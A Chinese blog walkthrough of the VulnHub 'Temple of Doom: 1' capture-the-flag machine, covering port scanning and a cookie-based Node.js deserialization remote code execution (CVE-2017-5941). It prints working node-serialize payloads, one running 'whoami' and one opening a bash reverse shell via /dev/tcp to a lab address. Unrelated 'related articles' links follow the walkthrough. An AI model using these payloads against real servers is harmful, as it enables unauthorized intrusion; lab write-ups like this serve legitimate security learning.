VulnHub-Temple of Doom: 1-靶机渗透学习

访客4年前黑客资讯519

靶机地址:https://www.vulnhub.com/entry/temple-of-doom-1,243/

靶机难度:中级(CTF)

靶机发布日期:2018年6月8日

靶机描述:

由https://twitter.com/0katz创建的CTF

]难度:简单/中级

在VirtualBox中测试

注意:2种扎根 ***

目标:得到root权限&找到flag.txt

作者:DXR嗯嗯呐


信息收集

nmap扫描IP

1610299152_5ffb3710ea1916d9206ad.png!small?1610299153641

nmap端口扫描

1610299164_5ffb371c1be7605881965.png!small?1610299164078

22 ssh

666 Express 是一个保持最小规模的灵活的 Node.js Web 应用程序开发框架,为 Web 和移动应用程序提供一组强大的功能。

访问80端口

1610299169_5ffb3721e3c54b19c8c53.png!small?1610299169857

没有获得有用的信息,使用dirb,nikto扫描,结果也没发现什么

1610299179_5ffb372b426bff4215b45.png!small?1610299179247

1610299185_5ffb3731df18578bc148c.png!small?1610299186543

Node.js远程命令执行漏洞

不知道怎么办了,使用burpsuite抓一下包看看吧

1610299193_5ffb37398bb17a0b551f9.png!small?1610299193598


看到了cookie的值可能是一个base64编码

1610299218_5ffb375243c13e0b89ecd.png!small?1610299218484

界面获得一个json字符串感觉格式不完整,修改一下

解码后

{"username":"Admin","csrftoken":"u32t4o3tb3gg431fs34ggdgchjwnza0l=","Expires=":Friday, 13 Oct 2018 00:00:00 GMTIn0%3D

修改后

重新编码提交,获得一个界面

1610299227_5ffb375b60014fcf4478b.png!small?1610299227329

加上cookie使用dirb扫描依然失败,看了看老人们的,发现这里是考Node.js反序列化远程代码执行(CVE-2017-5941)这个漏洞

大佬写的很具体

{"username":"_$$ND_FUNC$$_function(){return require('child_process').execSync('whoami',(error,stdout,stderr)=>{console.log(stdout)}); }()"}


  • child_process是node.js中的一个模块,它以类似于popen(3)的方式生成子进程。
  • child_process.exec 使用子进程exec执行命令,缓存子进程的输出,并将子进程的输出以回调函数参数的形式返回。

编译后

eyJ1c2VybmFtZSI6Il8kJE5EX0ZVTkMkJF9mdW5jdGlvbigpe3JldHVybiByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlY1N5bmMoJ3dob2FtaScsKGU *** 3V0LGVycik9Pntjb25zb2xlLmxvZyhvdXQpO30pOyB9KCkifQo=

1610299408_5ffb381015e5cea28130d.png!small?1610299408371

获得用户名 nodeadmin

直接使用bash获得反弹shell

{"username":"_$$ND_FUNC$$_function(){return require('child_process').execSync('bash -i >& /dev/tcp/192.168.56.3/5555 0>&1',(error,stdout,stderr)=>{console.log(stdout)}); }()"}

1610299347_5ffb37d344dfda017d769.png!small?1610299348427

相关文章

40岁女人用什么牌子护肤品好,推荐几款好口碑品

40岁女人用什么牌子护肤品好,推荐几款好口碑品

口碑最好的国产护肤品?盘点国货护肤品中的那些经典产品之二 五、相宜本草经典产品 1、相宜本草四倍蚕丝凝亮套装:首先是洁面膏:出膏口处有锡纸封闭,即卫生,又防止膏体外溢,膏体洁白泡沫丰富细腻,洗...

浙江公布 净网2018专项行动成果,抓获嫌疑人2万余人_聊天记录

12月14日,浙江省公安厅召开新闻发布会通报“净网2018专项行动”以来的相关成果。 从通报会获悉,截至目前,全省公安机关共侦破各类涉网刑事案件5139起,抓获犯罪嫌疑人20040人;清理违法有害信息...

足不出户在家赚钱(如何足不出户在家赚钱)

  伴随着互联网的迅速发展趋势,创业商机经常可以看到。在这类情况下,很多己婚全职的家庭妇女不会再达到于照料亲人,也逐渐方案找一些项目赚钱。那麼,结了婚的女人做什么挣钱呢?2018年怎样在家挣钱?我们一...

什么软件可以查询亲戚和其他女人聊天记录

宝宝春季很容易就呼吸道感染了,那么孩子呼吸道感染怎么做,如何预防孩子呼吸道方面的疾病呢,孩子呼吸道疾病预防方法。 如何预防孩子呼吸道疾病 首先,家长要知道,呼吸道感染分为上呼吸道感染和下呼吸道感染...

有没有类似于黑客的小说(黑客好看的小说)

有没有类似于黑客的小说(黑客好看的小说)

本文目录一览: 1、黑客类的小说 2、求几本黑客类的小说 3、谁推荐几本关于黑客的小说,主要内容要带点计算机知识的,类似于《黑客传说》,《我是一个黑客》 黑客类的小说 重生之黑而不死而为神力...